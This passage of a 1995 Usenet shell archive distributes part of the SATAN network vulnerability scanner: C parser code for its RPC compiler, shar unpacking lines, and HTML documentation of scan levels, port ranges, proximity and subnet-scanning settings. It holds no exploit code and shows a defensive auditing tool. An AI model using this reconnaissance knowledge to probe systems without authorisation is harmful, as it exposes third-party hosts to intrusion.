X * In no event will Sun Microsystems, Inc. be liable for any lost revenue
X * or profits or other special, indirect and consequential damages, even if
X * Sun has been advised of the possibility of such damages.
X *
X * Sun Microsystems, Inc.
X * 2550 Garcia Avenue
X * Mountain View, California 94043
X */
X#ifndef lint
Xstatic char sccsid[] = "@(#)rpc_parse.c 1.4 87/04/28 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_parse.c, Parser for the RPC protocol compiler
X * Copyright (C) 1987 Sun Microsystems, Inc.
X */
X#include <stdlib.h>
X#include <unistd.h>
X#include <stdio.h>
X#include "rpc_util.h"
X#include "rpc_scan.h"
X#include "rpc_parse.h"
X
Xstatic isdefined();
Xstatic def_struct();
Xstatic def_program();
Xstatic def_enum();
Xstatic def_const();
Xstatic def_union();
Xstatic def_typedef();
Xstatic get_declaration();
Xstatic get_type();
Xstatic unsigned_dec();
X
X/*
X * return the next definition you see
X */
Xdefinition *
Xget_definition()
X{
X definition *defp;
X token tok;
X
X defp = ALLOC(definition);
X get_token(&tok);
X switch (tok.kind) {
X case TOK_STRUCT:
X def_struct(defp);
X break;
X case TOK_UNION:
X def_union(defp);
X break;
X case TOK_TYPEDEF:
X def_typedef(defp);
X break;
X case TOK_ENUM:
X def_enum(defp);
X break;
X case TOK_PROGRAM:
X def_program(defp);
X break;
X case TOK_CONST:
X def_const(defp);
X break;
X case TOK_EOF:
X return (NULL);
X break;
X default:
X error("definition keyword expected");
X }
X scan(TOK_SEMICOLON, &tok);
X isdefined(defp);
X return (defp);
X}
X
Xstatic
Xisdefined(defp)
X definition *defp;
X{
X STOREVAL(&defined, defp);
X}
X
X
Xstatic
Xdef_struct(defp)
X definition *defp;
X{
X token tok;
X declaration dec;
X decl_list *decls;
X decl_list **tailp;
X
X defp->def_kind = DEF_STRUCT;
X
X scan(TOK_IDENT, &tok);
X defp->def_name = tok.str;
X scan(TOK_LBRACE, &tok);
X tailp = &defp->def.st.decls;
X do {
X get_declaration(&dec, DEF_STRUCT);
X decls = ALLOC(decl_list);
X decls->decl = dec;
X *tailp = decls;
X tailp = &decls->next;
X scan(TOK_SEMICOLON, &tok);
X peek(&tok);
X } while (tok.kind != TOK_RBRACE);
X get_token(&tok);
X *tailp = NULL;
X}
X
Xstatic
Xdef_program(defp)
X definition *defp;
X{
X token tok;
X version_list *vlist;
X version_list **vtailp;
X proc_list *plist;
X proc_list **ptailp;
X
X defp->def_kind = DEF_PROGRAM;
X scan(TOK_IDENT, &tok);
X defp->def_name = tok.str;
X scan(TOK_LBRACE, &tok);
X vtailp = &defp->def.pr.versions;
X scan(TOK_VERSION, &tok);
X do {
X scan(TOK_IDENT, &tok);
X vlist = ALLOC(version_list);
X vlist->vers_name = tok.str;
X scan(TOK_LBRACE, &tok);
X ptailp = &vlist->procs;
X do {
X plist = ALLOC(proc_list);
X get_type(&plist->res_prefix, &plist->res_type, DEF_PROGRAM);
X if (streq(plist->res_type, "opaque")) {
X error("illegal result type");
X }
X scan(TOK_IDENT, &tok);
X plist->proc_name = tok.str;
X scan(TOK_LPAREN, &tok);
X get_type(&plist->arg_prefix, &plist->arg_type, DEF_PROGRAM);
X if (streq(plist->arg_type, "opaque")) {
X error("illegal argument type");
X }
X scan(TOK_RPAREN, &tok);
X scan(TOK_EQUAL, &tok);
X scan_num(&tok);
X scan(TOK_SEMICOLON, &tok);
X plist->proc_num = tok.str;
X *ptailp = plist;
X ptailp = &plist->next;
X peek(&tok);
X } while (tok.kind != TOK_RBRACE);
X *vtailp = vlist;
X vtailp = &vlist->next;
X scan(TOK_RBRACE, &tok);
X scan(TOK_EQUAL, &tok);
X scan_num(&tok);
X vlist->vers_num = tok.str;
X scan(TOK_SEMICOLON, &tok);
X scan2(TOK_VERSION, TOK_RBRACE, &tok);
X } while (tok.kind == TOK_VERSION);
X scan(TOK_EQUAL, &tok);
X scan_num(&tok);
X defp->def.pr.prog_num = tok.str;
X *vtailp = NULL;
X}
X
Xstatic
Xdef_enum(defp)
X definition *defp;
X{
X token tok;
X enumval_list *elist;
X enumval_list **tailp;
X
X defp->def_kind = DEF_ENUM;
X scan(TOK_IDENT, &tok);
X defp->def_name = tok.str;
X scan(TOK_LBRACE, &tok);
X tailp = &defp->def.en.vals;
X do {
X scan(TOK_IDENT, &tok);
X elist = ALLOC(enumval_list);
X elist->name = tok.str;
X elist->assignment = NULL;
X scan3(TOK_COMMA, TOK_RBRACE, TOK_EQUAL, &tok);
X if (tok.kind == TOK_EQUAL) {
X scan_num(&tok);
X elist->assignment = tok.str;
X scan2(TOK_COMMA, TOK_RBRACE, &tok);
X }
X *tailp = elist;
X tailp = &elist->next;
X } while (tok.kind != TOK_RBRACE);
X *tailp = NULL;
X}
X
Xstatic
Xdef_const(defp)
X definition *defp;
X{
X token tok;
X
X defp->def_kind = DEF_CONST;
X scan(TOK_IDENT, &tok);
X defp->def_name = tok.str;
X scan(TOK_EQUAL, &tok);
X scan2(TOK_IDENT, TOK_STRCONST, &tok);
X defp->def.co = tok.str;
X}
X
Xstatic
Xdef_union(defp)
X definition *defp;
X{
X token tok;
X declaration dec;
X case_list *cases;
X case_list **tailp;
X
X defp->def_kind = DEF_UNION;
X scan(TOK_IDENT, &tok);
X defp->def_name = tok.str;
X scan(TOK_SWITCH, &tok);
X scan(TOK_LPAREN, &tok);
X get_declaration(&dec, DEF_UNION);
X defp->def.un.enum_decl = dec;
X tailp = &defp->def.un.cases;
X scan(TOK_RPAREN, &tok);
X scan(TOK_LBRACE, &tok);
X scan(TOK_CASE, &tok);
X while (tok.kind == TOK_CASE) {
X scan(TOK_IDENT, &tok);
X cases = ALLOC(case_list);
X cases->case_name = tok.str;
X scan(TOK_COLON, &tok);
X get_declaration(&dec, DEF_UNION);
X cases->case_decl = dec;
X *tailp = cases;
X tailp = &cases->next;
X scan(TOK_SEMICOLON, &tok);
X scan3(TOK_CASE, TOK_DEFAULT, TOK_RBRACE, &tok);
X }
X *tailp = NULL;
X if (tok.kind == TOK_DEFAULT) {
X scan(TOK_COLON, &tok);
X get_declaration(&dec, DEF_UNION);
X defp->def.un.default_decl = ALLOC(declaration);
X *defp->def.un.default_decl = dec;
X scan(TOK_SEMICOLON, &tok);
X scan(TOK_RBRACE, &tok);
X } else {
X defp->def.un.default_decl = NULL;
X }
X}
X
X
Xstatic
Xdef_typedef(defp)
X definition *defp;
X{
X declaration dec;
X
X defp->def_kind = DEF_TYPEDEF;
X get_declaration(&dec, DEF_TYPEDEF);
X defp->def_name = dec.name;
X defp->def.ty.old_prefix = dec.prefix;
X defp->def.ty.old_type = dec.type;
X defp->def.ty.rel = dec.rel;
X defp->def.ty.array_max = dec.array_max;
X}
X
X
Xstatic
Xget_declaration(dec, dkind)
X declaration *dec;
X defkind dkind;
X{
X token tok;
X
X get_type(&dec->prefix, &dec->type, dkind);
X dec->rel = REL_ALIAS;
X if (streq(dec->type, "void")) {
X return;
X }
X scan2(TOK_STAR, TOK_IDENT, &tok);
X if (tok.kind == TOK_STAR) {
X dec->rel = REL_POINTER;
X scan(TOK_IDENT, &tok);
X }
X dec->name = tok.str;
X if (peekscan(TOK_LBRACKET, &tok)) {
X if (dec->rel == REL_POINTER) {
X error("no array-of-pointer declarations -- use typedef");
X }
X dec->rel = REL_VECTOR;
X scan_num(&tok);
X dec->array_max = tok.str;
X scan(TOK_RBRACKET, &tok);
X } else if (peekscan(TOK_LANGLE, &tok)) {
X if (dec->rel == REL_POINTER) {
X error("no array-of-pointer declarations -- use typedef");
X }
X dec->rel = REL_ARRAY;
X if (peekscan(TOK_RANGLE, &tok)) {
X dec->array_max = "~0"; /* unspecified size, use max */
X } else {
X scan_num(&tok);
X dec->array_max = tok.str;
X scan(TOK_RANGLE, &tok);
X }
X }
X if (streq(dec->type, "opaque")) {
X if (dec->rel != REL_ARRAY && dec->rel != REL_VECTOR) {
X error("array declaration expected");
X }
X } else if (streq(dec->type, "string")) {
X if (dec->rel != REL_ARRAY) {
X error("variable-length array declaration expected");
X }
X }
X}
X
X
Xstatic
Xget_type(prefixp, typep, dkind)
X char **prefixp;
X char **typep;
X defkind dkind;
X{
X token tok;
X
X *prefixp = NULL;
X get_token(&tok);
X switch (tok.kind) {
X case TOK_IDENT:
X *typep = tok.str;
X break;
X case TOK_STRUCT:
X case TOK_ENUM:
X case TOK_UNION:
X *prefixp = tok.str;
X scan(TOK_IDENT, &tok);
X *typep = tok.str;
X break;
X case TOK_UNSIGNED:
X unsigned_dec(typep);
X break;
X case TOK_SHORT:
X *typep = "short";
X (void) peekscan(TOK_INT, &tok);
X break;
X case TOK_LONG:
X *typep = "long";
X (void) peekscan(TOK_INT, &tok);
X break;
X case TOK_VOID:
X if (dkind != DEF_UNION && dkind != DEF_PROGRAM) {
X error("voids allowed only inside union and program definitions");
X }
X *typep = tok.str;
X break;
X case TOK_STRING:
X case TOK_OPAQUE:
X case TOK_CHAR:
X case TOK_INT:
X case TOK_FLOAT:
X case TOK_DOUBLE:
X case TOK_BOOL:
X *typep = tok.str;
X break;
X default:
X error("expected type specifier");
X }
X}
X
X
Xstatic
Xunsigned_dec(typep)
X char **typep;
X{
X token tok;
X
X peek(&tok);
X switch (tok.kind) {
X case TOK_CHAR:
X get_token(&tok);
X *typep = "u_char";
X break;
X case TOK_SHORT:
X get_token(&tok);
X *typep = "u_short";
X (void) peekscan(TOK_INT, &tok);
X break;
X case TOK_LONG:
X get_token(&tok);
X *typep = "u_long";
X (void) peekscan(TOK_INT, &tok);
X break;
X case TOK_INT:
X get_token(&tok);
X *typep = "u_int";
X break;
X default:
X *typep = "u_int";
X break;
X }
X}
END_OF_FILE
if test 9251 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_parse.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_parse.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_parse.c'
fi
echo shar: End of archive 4 $of 15$.
cp /dev/null ark4isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 129
Archive-name: satan/part05

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/html/docs/satan.cf.html
# satan-1.1.1/html/docs/the_main_parts.html
# satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html
# satan-1.1.1/src/fping/AUTHOR satan-1.1.1/src/nfs-chk/nfs-chk.c
# satan-1.1.1/src/port_scan/tcp_scan.c
# Wrapped by kent@ftp on Wed Apr 12 20:30:08 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 5 (of 15)."'
if test -f 'satan-1.1.1/html/docs/satan.cf.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/satan.cf.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/satan.cf.html'\" $10738 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/satan.cf.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Configuration File</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">The SATAN configuration file</H1>
X<HR>
X<p>
X<OL>
X<li> <A HREF="#attack-level"> Attack Level</A>
X<li> <A HREF="#correspond"> Which Probes Correspond to the Attack Level</A>
X<li> <A HREF="#status-file"> The What's and Where's of the Current Probe</A>
X<li> <A HREF="#timeouts"> Timeouts</A>
X<li> <A HREF="#timeout-signals"> Timeout Signals</A>
X<li> <A HREF="#prox-vars"> Proximity Variables</A> - <STRONG>IMPORTANT</STRONG>
X<li> <A HREF="#trust"> Trusted or Untrusted</A>
X<li> <A HREF="#exceptions"> Targeting Exceptions</A>
X<li> <A HREF="#workarounds"> Workarounds: DNS, ICMP </A>
X</OL>
X
X<HR>
XThe SATAN configuration file (<I>config/satan.cf</I>) is
X<STRONG><I>VERY</I></STRONG> important! Almost everything SATAN does
Xwhen scanning hosts and networks is controlled through this file; how
Xhard to probe the targets, how far the probes will spread from the
Xoriginal host, what tests will be run, etc. While a limited number of
Xconfiguration options can be controlled via the HTML user interface, the
Xvery low-level variables must be configured by manually editing this
Xfile.
X<p>
XThis file is nothing more than perl code that gets run when the program
Xinitializes; don't be intimidated by that, however - it is fairly easy
Xto read and is heavily commented (if you don't know perl, comments
X(lines that don't do anything) are lines that start with a sharp/pound
Xsign ("#")). Variables are tokens that start with a dollar sign; values
Xof 0 or null ("") typically mean false, unless otherwise noted.
X<p>
XThe easiest way to explain all of the options is by simply going over
Xeach line in the file and explain what it does:
X<p>
X<A NAME="attack-level"> <H3>Attack Level</H3> </A>
X<PRE>
X # Default attack level (0=light, 1=normal, 2=heavy)
X $attack_level = 0;
X</PRE>
XThis sets the attack level, which in turn tells SATAN which probes
Xto use (<A HREF="#attack-level"> see below</A>) against a target host.
X<p>
X<A NAME="correspond"> <H3>Which Probes Correspond to the Attack Level</H3></A>
XThis section is a bit tricky; the 3 types of probes (light, normal,
Xheavy) each have a set of programs that they use when
Xprobing a remote system. As with any of the other variables in the
Xprogram used, these can be changed as desired. the programs that are
X<p>
XHowever, there is one twist; not all probes are run, even though they
Xmight be listed under an attack level. If a SATAN probe has a question
Xmark ("?") appended to its name, it will run conditionally.
XWhat does this mean? Take, for instance, the NFS SATAN checker. There
Xis no reason to run it if the remote system isn't running NFS (indeed,
Xyou shouldn't run it, because the program will waste time timing out on
Xthe remote host), so SATAN will only run this if it determines that NFS
Xis being run.
X<p>
XSo, examining the first few lines in this section reveals:
X<PRE>
X # Probes by attack level.
X #
X # ? Means conditional, controlled by rules.todo. * Matches anything.
X @light = (
X 'dns.satan',
X 'rpc.satan',
X 'showmount.satan?',
X );
X</PRE>
X<p>
XThis means that a light scan will run the <I>dns.satan</I> and the
X<I>rpc.satan</I> scans, and the <I>showmount.satan</I> if SATAN
Xdetermines that the target is running NFS.
X<p>
XA bit further down shows:
X<PRE>
X @normal = (
X @light,
X 'finger.satan',
X 'tcpscan.satan 70,80,ftp,telnet,smtp,nntp,uucp',
X 'udpscan.satan 53,177',
X 'rusers.satan?',
X 'boot.satan?',
X );
X
X @heavy = (
X @normal,
X $heavy_tcp_scan = 'tcpscan.satan 1-9999',
X $heavy_udp_scan = 'udpscan.satan 1-2050,32767-33500',
X '*?',
X );
X</PRE>
XNothing unusual here, except for the tcp and udp scan numbers; these
Xrefer to the port numbers that SATAN examines for signs of activity.
X<A NAME="status-file"> <H3>Status File</H3></A>
XSATAN keeps track of what the latest attack is in a file. This filename
Xis stored in <I>$status_file</I> and is updated before each new probe runs:
X<PRE>
X # status file; keeps track of what probe is currently running and at what time it started
X $status_file = "status_file";
X</PRE>
X<A NAME="timeouts"> <H3>Timeouts</H3></A>
XCertain network probes will "hang", or continue to try to contact the
Xremote host for a <STRONG>very</STRONG> long time. To prevent this from
Xslowing down the overall scan, there are three timeout values (in
Xseconds) that SATAN recognizes:
X<PRE>
X # timeout values
X $slow_timeout = 60;
X $med_timeout = 20;
X $fast_timeout = 10;
X</PRE>
XBy default, all SATAN probes are launched with the same timeout value,
Xwhich can be set from the command line or from the HTML interface.
XSATAN defaults to a medium timeout value.
X<p>
XSome tools need more time, such as the nfs checker, or the port scanner
Xwhen many ports are to be scanned. For this reason you override the
Xdefault timeout for specific tools. Examples:
X<pre>
X %timeouts = (
X 'nfs-chk', $slow_timeout,
X $heavy_tcp_scan, $slow_timeout,
X );
X</pre>
X
X<p>
X
X<A NAME="timeout-signals"> <H3>Timeout Signals</H3></A>
XWhen a timeout occurs, a signal is sent to the process running to stop
Xit. This defaults to "9", which basically means that the process is toast:
X<PRE>
X # what signal we send to nuke things when they timeout:
X $timeout_kill = 9;
X</PRE>
X
X<A NAME="prox-vars"> <H3>Proximity Variables</H3></A>
XThis is probably the most critical variable in the entire SATAN program.
XUnder <STRONG>NO</STRONG> circumstances do you want to set this to
Xanything over "3" unless you know <STRONG>EXACTLY</STRONG> what you're
Xdoing! Anything over "0" can affect sites other than your own.
X<p>
XProximity refers to how close the current target is from the original
Xtarget of the SATAN probe. For instance, if you probe
X<I>victim.com</I> and find that <I>nic.ddn.mil</I> is its
Xnameserver, then <I>nic.ddn.mil</I>'s proximity level would be "1",
Xand SATAN might probe that host next, depending on the rules you choose.
X<p>
XThe number of hosts SATAN scans can grow exponentially, so again, be
Xcareful!
X<PRE>
X #
X # Proximity variables; how far out do we attack, does severity go down, etc.
X #
X # how far out from the original target do we attack?
X $max_proximity_level = 0;
X</PRE>
XSATAN defaults to 0, which means that it will only scan the primary
Xtargets selected.
X<p>
XAs SATAN gets farther away from the primary target, the attacks will get
Xweaker - this presumes that you can attack your own sites as much as
Xdesired, but since you might not know where SATAN will end up, you'd
Xlike to be cautious the farther away the probes are going from your own
Xhost.
X<PRE>
X # Attack level drops by this much each proximity level change
X $proximity_descent = 1;
X</PRE>
XThis value is subtracted from the current <A HREF="#attack-level">attack
Xlevel</A> - a value of zero means that attacks do not diminish in
Xstrength.
X<p>
XIf the attack level goes below zero, do you stop or go on? The
X"$sub_zero_proximity" variable determines this:
X<PRE>
X # when we go below zero attack severity, do we stop (0) or go on (1)?
X $sub_zero_proximity = 0;
X</PRE>
XSATAN will, by default, examine only one target at a time. If the
X"$attack_proximate_subnets" variable is set to "1", then
X<STRONG>ALL</STRONG> targets on the secondary target's subnet will be
Xscanned. Be <STRONG>VERY</STRONG> careful when changing this!a
X<PRE>
X # a question; do we attack subnets when we nuke a target?
X # 0 = no; 1 = primary target subnet
X $attack_proximate_subnets = 0;
X</PRE>
X
X<A NAME="trust"> <H3>Trusted or Untrusted</H3>
X
XBy default, SATAN assumes that it is being run from "inside". This
Xmeans that the probing host may appear in other hosts <i>rhosts,
Xhosts.equiv</i> or <i>NFS export</i> files.
X
X<PRE>
X #
X # Does SATAN run on an untrusted host? (0=no; 1=yes, this host may appear
X # in the rhosts, hosts.equiv or NFS export files of hosts that are being
X # probed).
X #
X $untrusted_host = 0;
X</PRE>
X
X<A NAME="exceptions"> <H3>Targeting Exceptions</H3></A>
XWithout precautions, SATAN can probe sites that you might not want
Xit to. Exceptions are a way to prevent SATAN from going astray.
XThere are two ways of setting this up, and
Xeach is controlled by a variable name. The <I>$only_attack_these</I>
Xvariable is a list of domains and/or networks
Xthat tells SATAN to only attack hosts that match one of those patterns.
XFor example, if you wanted SATAN to only attack educational sites,
Xyou could say:
X<PRE>
X $only_attack_these = "edu";
X</PRE>
XSimilarly, there is a variable, <I>$dont_attack_these</I>, which you
Xcan set to a list of domains and/or networks that
XSATAN should <STRONG><I>never</I></STRONG> attack.
XLooking at the last part of the configuration file gives further
Xexamples of this:
X<PRE>
X #
X # If $only_attack_these is non-null, *only* hit sites if they are of this
X # type. You can specify a domain (podunk.edu) or network number
X # (192.9.9). You can specify any combination of domains and or networks
X # as long as you separate them by whitespace and/or commas.
X #
X # Examples:
X #
X # $only_attack_these = "podunk.edu";
X # $only_attack_these = "192.9.9";
X # $only_attack_these = "podunk.edu, 192.9.9";
X #
X $only_attack_these = "";
X
X #
X # Stay away from anyone that matches these patterns.
X #
X # Example - leave government and military sites alone:
X #
X # $dont_attack_these = "gov, mil";
X $dont_attack_these = "";
X</PRE>
X
X<A NAME="workarounds"> <H3>Workarounds: DNS, ICMP</H3></A>
X
X<h4>DNS</h4>
X
XSATAN wants to use fully-qualified host names (<i>host.domain</i>)
Xso that it can fix truncated hostnames, as found, for example, in
X<i>finger</i> output.
XThe <code>$dont_use_nslookup</code> flag controls whether
XSATAN should use the <i>nslookup</i> command to look up hostnames.
X<pre>
X # Set to nonzero if nslookup does not work.
X $dont_use_nslookup = 0;
X</pre>
X
X<h4>ICMP</H4>
X
XBefore probing a host, SATAN attempts to ping it. When the host does
Xnot respond, SATAN assumes the host is down and skips further probes.
XThe <code>$dont_use_ping</code> controls whether SATAN should ping
Xhosts before probing them. Set it to a non-zero value when ICMP does
Xnot work.
X<pre>
X # Set to nonzero if ICMP does not work.
X $dont_use_ping = 0;
X</pre>
X<HR>
XOf course, reading the perl code in the various modules can give more
Xhints on all of these configuration file options.
X

X<hr>
X<a href="satan_reference.html"> Back to the Reference TOC/Index</a>

X</BODY>
X</HTML>
END_OF_FILE

if test 10738 -ne `wc -c <'satan-1.1.1/html/docs/satan.cf.html'`; then
echo shar: \"'satan-1.1.1/html/docs/satan.cf.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/satan.cf.html'
fi
if test -f 'satan-1.1.1/html/docs/the_main_parts.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/the_main_parts.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/the_main_parts.html'\" $13689 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/the_main_parts.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Architecture</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Architecture</H1>
X
X<hr>
X
X<h3><a name="general">Architecture Overview </a></h3>
X
XSATAN has an extensible architecture. At the center is a relatively
Xsmall generic kernel that knows little to nothing about system types,
Xnetwork service names, vulnerabilities, or other details. Knowledge
Xabout the details of network services, system types, etc. is built into
Xsmall, dedicated, data collection tools and rule bases. The behaviour
Xof SATAN is controlled from a configuration file. Settings may be
Xoverruled via command-line options of via a hypertext user interface.
X
X<p>
X
XThe SATAN kernel consists of the following main parts:
X
X<dl>
X
X<p><dt><a href="#crypto-ignition>Magic cookie generator</a><dd> Each
Xtime SATAN is started up in interactive mode, the magic cookie generator
Xgenerates a pseudorandom string that the HTML browser must send to the
XSATAN custom http server as part of all commands.
X
X<p><dt><a href="#policy-engine">Policy engine</a>. <dd>Given the
Xconstraints specified in the SATAN <a href="satan.cf.html">
Xconfiguration file,</a> this subsystem determines whether a host may be
Xscanned, and what <a href="#scanning-levels">scanning level</a> is
Xappropriate for that host.
X
X<p><dt><a href="#target-acquisition">Target acquisition</a>. <dd>Given
Xa list of target hosts, this SATAN subsystem generates a list of probes
Xto be run on those hosts. The list of probes serves as input to the <a
Xhref="#data-acquisition">data acquisition</a> subsystem.
X
XThe target acquisition module also keeps track of a host's <a
Xhref="#proximity-levels">proximity level</a>, and handles the
Xso-called <a href="#subnet-scan">subnet expansions</a>.
X
X<p><dt><a href="#data-acquisition">Data acquisition</a>. <dd>Given a
Xlist of probes, this SATAN subsystem runs the corresponding data
Xcollection tools and generates new facts. These facts serve as input to
Xthe <a href="#inference-engine">inference engine</a>.
X
X<p><dt><a href="#inference-engine">Inference engine</a>. <dd>Given a
Xlist of facts, this subsystem generates new target hosts, new probes,
Xand new facts.
X
XNew target hosts serve as input to the <a href="#target-acquisition">
Xtarget acquisition</a> subsystem; new probes are handled by the <a
Xhref="#data-acquisition">data acquisition</a> subsystem, and new facts
Xare processed by the <a href="#inference-engine">inference engine</a>.
X
X<p><dt><a href="#report-analysis">Report and analysis</a>. <dd>This
Xsubsystem takes the collected data and builds a virtual hyperspace that
Xyou can explore with your favourite HTML browser.
X
X</dl>
X
XOnce SATAN is given an initial target host, the target acquisition,
Xdata acquisition and inference engine subsystems keep feeding each
Xother new data until nothing new comes up. Technically speaking, the
Xsystem does a breadth-first search.
X
X<h3><a name="crypto-ignition">Magic cookie generator</a></h3>
X
XWhen you start SATAN in interactive mode, i.e., using the HTML user
Xinterface, SATAN performs the following actions before starting up
Xthe HTML browser:
X
X<ul>
X
X<p><li>Start the SATAN httpd daemon. This is a very limited subset of the
Xtypical httpd daemon, sufficient to support all activities that SATAN
Xcan perform.
X
X<p><li>Generate a (hopefully "good") 32 byte cryptographic magic cookie for
Xthe upcoming SATAN run. SATAN runs several system utilities in
Xparallel and compresses their quasi-random output with the MD5 hashing
Xfunction. The HTML browser must specify this magic cookie as part of
Xthe URLs that it sends to the custom SATAN httpd daemon. If this key
Xis ever compromised, intruders could potentially execute any programs
Xthat the SATAN program can run, with the same privileges as the user
Xthat started the SATAN program. SATAN generates a new magic cookie for
Xeach session. SATAN and the HTML browser always run on the same host,
Xso there is no need to send the magic cookie over the network.
X
X<p><li>Read in any previously collected scan data. By default, SATAN will
Xread data in the <i>$satan_data</i> database. In the mean time HTML
Xbrowser comes up, but it will not be ale to communicate with SATAN
Xuntil the database has been read in. This can take anywhere from a few
Xseconds to several minutes, depending on the size of the database, the
Xspeed of the machine you're using to run SATAN on, the amount of
Xavailable RAM, etc.
X
X</ul>
X
X<h3><a name="policy-engine">Policy engine</a></h3>
X
XThe policy engine controls what hosts SATAN may probe. The probing
Xintensity depends on the host's <a href="#proximity-levels">proximity
Xlevel</a>, which is basically a measure for the distance from the
Xinitial target host(s). Probing intensities and probing constraints are
Xspecified in the <a href="satan.cf.html">configuration file</a>. This
Xfile can direct SATAN to stay within certain internet domains, or to
Xstay away from specific internet domains.
X
X<p>
X
X<h3><a name="proximity-levels"> Proximity levels </a></h3>
X
X<p>
X
XWhile SATAN gathers information from the so-called <i>primary</i>
Xtarget(s) that you specified, the program may learn about the existence
Xof other hosts. Examples of such <i>non-primary</i> systems are:
X
X<ul>
X
X<li>hosts found in remote login information from the <i>finger</i>
Xservice,
X
X<li>hosts that import file systems from the target, according to the
X<i>showmount</i> command.
X
X</ul>
X
XFor each host, SATAN maintains a proximity count. The proximity of a
Xprimary host is zero; for hosts that SATAN finds while probing a
Xprimary host, the proximity is one, and so on. By default, SATAN stays
Xaway from hosts with non-zero proximity, but you can override this
Xpolicy by editing the <a href="satan.cf.html">configuration file,</a>
Xvia command-line switches, or from the hypertext user interface.
X
X<h3><a name="target-acquisition">Target acquisition</a></h3>
X
XSATAN can gather data about just one host, or it can gather data about
Xall hosts within a subnet (a block of 256 adjacent network addresses).
XThe latter process is called a <a href="#subnet-scan">subnet scan
X</a>. Target hosts may be specified by the user, or may be generated
Xby the <a href="#inference-engine">inference engine</a> when it
Xprocesses facts that were generated by the <a href="#data-acquisition">
Xdata acquisition</a> module.
X
X<p>
X
XOnce a list of targets is available, the target acquisition module
Xgenerates a list of probes, according to the <a
Xhref="#scanning-levels">scanning level</a> derived by the <a
Xhref="#policy-engine">policy engine</a>. The actual data collection is
Xdone under control of the <a href="#data-acquisition">data
Xacquisition</a> module.
X
X<h3><a name="subnet-scan">Subnet scan</a></h3>
X
XWhen requested to scan all hosts in a subnet (a block of 256 internet
Xaddresses), SATAN uses the <i>fping</i> utility to find out what
Xhosts in that subnet actually are available. This is to avoid wasting
Xtime talking to hosts that no longer exist or that happen to be down at
Xthe time of the measurement. The <i>fping</i> scan also may discover
Xunregistered systems that have been attached to the network without
Xpermission from the network administrator.
X
X<h3><a name="data-acquisition">Data acquisition</a></h3>
X
XThe data acquisition engine takes a list of probes and executes each
Xprobe, after it has verified that the probe may be run at the target's
X<a href="#scanning-levels">scanning level</a>. What tool may be run at
Xa given scanning level is specified in the <a
Xhref="satan.cf.html">configuration file</a>. The software keeps a
Xrecord of what probes it has already executed, to avoid doing
Xunnecessary work. The result of data acquisition is a list of new facts
Xthat is processed by the <a href="#inference-engine">inference engine</a>.
X
X<p>
X
XSATAN comes with a multitude of little tools. Each tool implements one
Xtype of network probe. By convention, the name of a data collection
Xtool ends in <i>.satan</i>. Often these tools are just a few lines of
XPERL or shell script language. All tools produce output according to
Xthe same common <a href="satan.db.html">tool record format.</a>
XSATAN derives a great deal of power from this toolbox approach. When a
Xnew network feature becomes of interest, it is relatively easy to <a
Xhref="satan.probes.html">add your own probe</a>.
X
X<h3><a name="scanning-levels">Scanning levels</a></h3>
X
XSATAN can probe hosts at various levels of intensity. The scanning
Xlevel is controlled with the <a href="satan.cf.html">configuration
Xfile</a>, but can be overruled with command-line switches or via the
Xgraphical user interface.
X
X<dl>
X
X<p><dt>light
X
X<dd>This is the least intrusive scan. SATAN collects information from
Xthe DNS (Domain Name System), tries to establish what RPC (Remote
XProcedure Call) services the host offers, and what file systems it
Xshares via the network. With this information, SATAN finds out the
Xgeneral character of a host (file server, diskless workstation).
X
X<p><dt>normal (includes <i>light</i> scan probes)
X
X<dd>At this level, SATAN probes for the presence of common network
Xservices such as finger, remote login, ftp, WWW, Gopher, email and a
Xfew others. With this information, SATAN establishes the operating
Xsystem type and, where possible, the software release version.
X
X<p><dt>heavy (includes <i>normal</i> scan probes)
X
X<dd>After it has found out what services the target offers, SATAN looks
Xat them in more depth, and does a more exhaustive scan for network
Xservices offered by the target. At this scanning level SATAN finds out
Xif the anonymous FTP directory is writable, if the X Windows server has
Xits access control disabled, if there is a wildcard in the <i>
X/etc/hosts.equiv </i>file, and so on.
X
X</dl>
X
XThe fourth level, breaking into systems, has not been implemented.
X
X<p>
X
XAt each level SATAN may discover that critical access controls are
Xmissing or defective, or that the host is running a particular software
Xversion that is known to have problems. SATAN takes a conservative
Xapproach and does not exploit the problem.
X
X<h3><a name="inference-engine">Inference engine</a></h3>
X
XThe heart of SATAN is a collection of little inference engines. Each
Xengine is controlled by its own rule base. The rules are applied in
Xreal time, while data is being collected. The result of these
Xinferences are lists of new facts for the inference engine, new probes
Xfor the <a href="#data-acquisition">data acquisition engine</a>, or new
Xtargets for the <a href="#target-acquisition">target acquisition </a>
Xengine.
X
X<dl>
X
X<p><dt><a href="satan.rules.html#todo">rules/todo</a>
X
X<dd>Rules that decide what probe to perform next. For example, when
Xthe target host offers the FTP service, and when the target is being
